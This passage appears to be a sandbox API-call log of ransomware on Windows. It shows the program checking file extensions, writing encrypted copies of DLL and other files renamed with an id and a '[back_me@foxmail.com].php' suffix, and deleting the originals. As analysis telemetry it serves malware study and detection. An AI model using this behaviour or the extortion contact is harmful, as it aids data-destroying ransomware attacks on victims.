(lpString1=".xls", lpString2=".exe") returned 1 [0052.845] lstrlenW (lpString=".xlsx") returned 5 [0052.845] lstrcmpiW (lpString1=".xlsx", lpString2="e.exe") returned -1 [0052.845] lstrlenW (lpString=".ppt") returned 4 [0052.845] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0052.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\archive.exe") returned 41 [0052.845] lstrlenW (lpString=".zip") returned 4 [0052.845] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0052.845] lstrlenW (lpString=".rar") returned 4 [0052.845] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0052.845] lstrlenW (lpString=".bz2") returned 4 [0052.845] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0052.845] lstrlenW (lpString=".7z") returned 3 [0052.845] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0052.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\archive.exe") returned 41 [0052.845] lstrlenW (lpString=".dbf") returned 4 [0052.845] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0052.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\archive.exe") returned 41 [0052.845] lstrlenW (lpString=".1cd") returned 4 [0052.845] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0052.845] lstrlenW (lpString="C:\\Program Files\\Common Files\\archive.exe") returned 41 [0052.846] lstrlenW (lpString=".jpg") returned 4 [0052.846] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0052.846] lstrcmpiW (lpString1=".DLL", lpString2=".php") returned -1 [0052.846] lstrlenW (lpString="MSADDNDR.DLL") returned 12 [0052.846] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.074] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=99136) returned 1 [0053.074] CloseHandle (hObject=0x1b4) returned 1 [0053.074] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll")) returned 0x20 [0053.074] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.074] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.074] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.074] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.074] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0053.075] GetLastError () returned 0x0 [0053.075] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x18340, lpOverlapped=0x0) returned 1 [0053.078] WriteFile (in: hFile=0x1a8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0x18350, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0x18350, lpOverlapped=0x0) returned 1 [0053.080] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.080] WriteFile (in: hFile=0x1a8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.080] SetEndOfFile (hFile=0x1a8) returned 1 [0053.080] CloseHandle (hObject=0x1a8) returned 1 [0053.080] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.080] SetEndOfFile (hFile=0x1b4) returned 1 [0053.082] CloseHandle (hObject=0x1b4) returned 1 [0053.082] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.082] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll")) returned 1 [0053.082] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.082] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.082] lstrlenW (lpString=".doc") returned 4 [0053.082] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.082] lstrlenW (lpString=".docx") returned 5 [0053.082] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0053.083] lstrlenW (lpString=".pdf") returned 4 [0053.083] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.083] lstrlenW (lpString=".xls") returned 4 [0053.083] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.083] lstrlenW (lpString=".xlsx") returned 5 [0053.083] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0053.083] lstrlenW (lpString=".ppt") returned 4 [0053.083] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.083] lstrlenW (lpString=".zip") returned 4 [0053.083] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.083] lstrlenW (lpString=".rar") returned 4 [0053.083] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.083] lstrlenW (lpString=".bz2") returned 4 [0053.083] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.083] lstrlenW (lpString=".7z") returned 3 [0053.083] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.083] lstrlenW (lpString=".dbf") returned 4 [0053.083] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.083] lstrlenW (lpString=".1cd") returned 4 [0053.083] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.083] lstrlenW (lpString=".jpg") returned 4 [0053.083] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.083] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.083] lstrlenW (lpString=".doc") returned 4 [0053.084] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.084] lstrlenW (lpString=".docx") returned 5 [0053.084] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0053.084] lstrlenW (lpString=".pdf") returned 4 [0053.084] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.084] lstrlenW (lpString=".xls") returned 4 [0053.084] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.084] lstrlenW (lpString=".xlsx") returned 5 [0053.084] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0053.084] lstrlenW (lpString=".ppt") returned 4 [0053.084] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.084] lstrlenW (lpString=".zip") returned 4 [0053.084] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.084] lstrlenW (lpString=".rar") returned 4 [0053.084] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.084] lstrlenW (lpString=".bz2") returned 4 [0053.084] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.084] lstrlenW (lpString=".7z") returned 3 [0053.084] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.084] lstrlenW (lpString=".dbf") returned 4 [0053.084] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.084] lstrlenW (lpString=".1cd") returned 4 [0053.084] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.084] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0053.084] lstrlenW (lpString=".jpg") returned 4 [0053.084] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.085] lstrcmpiW (lpString1=".DLL", lpString2=".php") returned -1 [0053.085] lstrlenW (lpString="EEINTL.DLL") returned 10 [0053.085] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.086] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=64096) returned 1 [0053.086] CloseHandle (hObject=0x1b4) returned 1 [0053.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll")) returned 0x20 [0053.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.086] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.086] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.087] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.087] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0053.088] GetLastError () returned 0x0 [0053.088] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0xfa60, lpOverlapped=0x0) returned 1 [0053.091] WriteFile (in: hFile=0x1a8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xfa70, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xfa70, lpOverlapped=0x0) returned 1 [0053.093] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.093] WriteFile (in: hFile=0x1a8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0053.093] SetEndOfFile (hFile=0x1a8) returned 1 [0053.093] CloseHandle (hObject=0x1a8) returned 1 [0053.093] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.093] SetEndOfFile (hFile=0x1b4) returned 1 [0053.094] CloseHandle (hObject=0x1b4) returned 1 [0053.094] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.095] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll")) returned 1 [0053.095] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.095] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.095] lstrlenW (lpString=".doc") returned 4 [0053.095] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.095] lstrlenW (lpString=".docx") returned 5 [0053.095] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0053.095] lstrlenW (lpString=".pdf") returned 4 [0053.095] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.095] lstrlenW (lpString=".xls") returned 4 [0053.095] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.095] lstrlenW (lpString=".xlsx") returned 5 [0053.095] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0053.095] lstrlenW (lpString=".ppt") returned 4 [0053.095] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.095] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.095] lstrlenW (lpString=".zip") returned 4 [0053.095] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.095] lstrlenW (lpString=".rar") returned 4 [0053.095] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.095] lstrlenW (lpString=".bz2") returned 4 [0053.095] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.095] lstrlenW (lpString=".7z") returned 3 [0053.095] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.096] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.096] lstrlenW (lpString=".dbf") returned 4 [0053.096] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.096] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.096] lstrlenW (lpString=".1cd") returned 4 [0053.096] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.096] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.096] lstrlenW (lpString=".jpg") returned 4 [0053.096] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.096] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.096] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.096] lstrlenW (lpString=".doc") returned 4 [0053.096] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0053.096] lstrlenW (lpString=".docx") returned 5 [0053.096] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0053.096] lstrlenW (lpString=".pdf") returned 4 [0053.096] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0053.096] lstrlenW (lpString=".xls") returned 4 [0053.096] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0053.096] lstrlenW (lpString=".xlsx") returned 5 [0053.096] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0053.096] lstrlenW (lpString=".ppt") returned 4 [0053.096] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0053.096] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.096] lstrlenW (lpString=".zip") returned 4 [0053.096] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0053.096] lstrlenW (lpString=".rar") returned 4 [0053.096] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0053.096] lstrlenW (lpString=".bz2") returned 4 [0053.096] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0053.097] lstrlenW (lpString=".7z") returned 3 [0053.097] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0053.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.097] lstrlenW (lpString=".dbf") returned 4 [0053.097] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0053.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.097] lstrlenW (lpString=".1cd") returned 4 [0053.097] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0053.097] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned 71 [0053.097] lstrlenW (lpString=".jpg") returned 4 [0053.097] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0053.097] lstrcmpiW (lpString1=".CNT", lpString2=".php") returned -1 [0053.097] lstrlenW (lpString="EQNEDT32.CNT") returned 12 [0053.097] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.098] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=2557) returned 1 [0053.098] CloseHandle (hObject=0x1b4) returned 1 [0053.098] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt")) returned 0x20 [0053.098] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0053.099] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0053.099] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.099] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.099] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0053.099] GetLastError () returned 0x0 [0053.099] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x9fd, lpOverlapped=0x0) returned 1 [0053.101] WriteFile (in: hFile=0x1a8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xa00, lpOverlapped=0x0) returned 1 [0053.102] ReadFile (in: hFile=0x1b4, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.102] WriteFile (in: hFile=0x1a8, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.102] SetEndOfFile (hFile=0x1a8) returned 1 [0053.102] CloseHandle (hObject=0x1a8) returned 1 [0053.102] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.102] SetEndOfFile (hFile=0x1b4) returned 1 [0053.103] CloseHandle (hObject=0x1b4) returned 1 [0053.103] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0053.103] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt")) returned 1 [0053.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0053.103] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0053.103] lstrlenW (lpString=".doc") returned 4 [0053.103] lstrcmpiW (lpString1=".doc", lpString2=".CNT") returned 1 [0053.103] lstrlenW (lpString=".docx") returned 5 [0053.104] lstrcmpiW (lpString1=".docx", lpString2="2.CNT") returned -1 [0053.104] lstrlenW (lpString=".pdf") returned 4 [0053.104] lstrcmpiW (lpString1=".pdf", lpString2=".CNT") returned 1 [0053.104] lstrlenW (lpString=".xls") returned 4 [0053.104] lstrcmpiW (lpString1=".xls", lpString2=".CNT") returned 1 [0053.104] lstrlenW (lpString=".xlsx") returned 5 [0053.104] lstrcmpiW (lpString1=".xlsx", lpString2="2.CNT") returned -1 [0053.104] lstrlenW (lpString=".ppt") returned 4 [0053.104] lstrcmpiW (lpString1=".ppt", lpString2=".CNT") returned 1 [0053.104] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0053.104] lstrlenW (lpString=".zip") returned 4 [0053.104] lstrcmpiW (lpString1=".zip", lpString2=".CNT") returned 1 [0053.104] lstrlenW (lpString=".rar") returned 4 [0053.104] lstrcmpiW (lpString1=".rar", lpString2=".CNT") returned 1 [0053.104] lstrlenW (lpString=".bz2") returned 4 [0053.104] lstrcmpiW (lpString1=".bz2", lpString2=".CNT") returned -1 [0053.104] lstrlenW (lpString=".7z") returned 3 [0053.105] lstrcmpiW (lpString1=".7z", lpString2="CNT") returned -1 [0053.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0053.105] lstrlenW (lpString=".dbf") returned 4 [0053.105] lstrcmpiW (lpString1=".dbf", lpString2=".CNT") returned 1 [0053.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0053.105] lstrlenW (lpString=".1cd") returned 4 [0053.105] lstrcmpiW (lpString1=".1cd", lpString2=".CNT") returned -1 [0053.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0053.105] lstrlenW (lpString=".jpg") returned 4 [0053.105] lstrcmpiW (lpString1=".jpg", lpString2=".CNT") returned 1 [0053.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0053.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0053.105] lstrlenW (lpString=".doc") returned 4 [0053.105] lstrcmpiW (lpString1=".doc", lpString2=".CNT") returned 1 [0053.105] lstrlenW (lpString=".docx") returned 5 [0053.105] lstrcmpiW (lpString1=".docx", lpString2="2.CNT") returned -1 [0053.105] lstrlenW (lpString=".pdf") returned 4 [0053.105] lstrcmpiW (lpString1=".pdf", lpString2=".CNT") returned 1 [0053.105] lstrlenW (lpString=".xls") returned 4 [0053.105] lstrcmpiW (lpString1=".xls", lpString2=".CNT") returned 1 [0053.105] lstrlenW (lpString=".xlsx") returned 5 [0053.105] lstrcmpiW (lpString1=".xlsx", lpString2="2.CNT") returned -1 [0053.105] lstrlenW (lpString=".ppt") returned 4 [0053.105] lstrcmpiW (lpString1=".ppt", lpString2=".CNT") returned 1 [0053.105] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0053.105] lstrlenW (lpString=".zip") returned 4 [0053.105] lstrcmpiW (lpString1=".zip", lpString2=".CNT") returned 1 [0053.105] lstrlenW (lpString=".rar") returned 4 [0053.105] lstrcmpiW (lpString1=".rar", lpString2=".CNT") returned 1 [0053.106] lstrlenW (lpString=".bz2") returned 4 [0053.106] lstrcmpiW (lpString1=".bz2", lpString2=".CNT") returned -1 [0053.106] lstrlenW (lpString=".7z") returned 3 [0053.106] lstrcmpiW (lpString1=".7z", lpString2="CNT") returned -1 [0053.106] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0053.106] lstrlenW (lpString=".dbf") returned 4 [0053.106] lstrcmpiW (lpString1=".dbf", lpString2=".CNT") returned 1 